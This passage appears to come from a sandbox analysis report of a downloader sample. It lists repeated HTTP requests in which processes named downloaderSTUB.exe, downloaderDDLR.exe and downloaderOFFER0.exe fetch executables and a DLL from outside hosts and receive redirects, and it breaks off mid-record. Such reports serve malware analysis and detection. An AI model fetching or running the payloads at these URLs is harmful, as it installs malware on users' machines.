    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:15 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:15 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 98
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:15 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:15 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:15 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 98
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 98
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 98
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:16 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 99
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:16 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:16 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 99
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 99
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:16 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 99
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:16 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 100
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:17 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:16 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:20 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:20 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 100
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 106
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 100
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 101
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 110
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:20 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:21 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:29 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:21 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:22 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 107
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 110
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:29 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 110
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 110
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 111
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
